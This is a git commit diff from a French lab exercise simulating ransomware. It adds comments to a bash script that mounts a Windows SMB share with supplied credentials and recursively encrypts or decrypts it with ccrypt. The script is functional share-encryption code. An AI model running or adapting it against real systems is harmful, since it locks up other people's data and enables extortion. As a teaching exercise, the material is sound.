Modification des fichiers du TP sur la simulation du ransomware, et

ajout de deux clés: une de test, et la vraie clé.
This commit is contained in:
Guillaume Emorine
2024-11-18 10:45:27 +01:00
parent cd8c794bc3
commit bcff0b9ebc
4 changed files with 18 additions and 10 deletions

View File

@@ -1,34 +1,39 @@
#!/bin/bash
# déclaration des variables
# Usage :
# bash smbcc.sh <chemin du partage Windows AVEC IP> <nom d'utilisateur/mot de passe> <action> <clé d'encryption>
# Déclaration des variables.
chemin=$1
cred=$2
action=$3
ficcle=$4
# récup du mot de passe et nom d'utilisateur
# Récupération du nom d'utilisateur et du mot de passe.
user=$(echo $cred| cut -d "/" -f1)
pass=$(echo $cred| cut -d "/" -f2)
# créa du répertoire et on monte dessus
# Création du répertoire s'il n'existe pas, et montage du partage Samba dessus.
[[ -e /mnt/samba ]] || mkdir /mnt/samba
mount.cifs -o "username=$user,password=$pass" "//${chemin}" /mnt/samba
# vérification d'erreurs
# Première vérification d'erreurs.
if [[ $? != 0 ]] ; then
rmdir /mnt/samba
exit 1
fi
# la commande ccrypt
# Commande ccrypt pour encrypter ou décrypter le répertoire avec le partage.
ccrypt "$action" -r -k $ficcle /mnt/samba
# vérification d'erreurs
# Seconde vérification d'erreurs.
if [[ $? != 0 ]] ; then
echo "ccrypt échoué, revérifie le script."
echo "Échec de ccrypt, veuillez relancer le script après avoir vérifié les paramètres."
umount /mnt/samba
exit 1
fi
# nettoyage et sortie, code 0
# Nettoyage des directoires, et sortie du script avec le code 0.
umount /mnt/samba
rmdir /mnt/samba
exit 0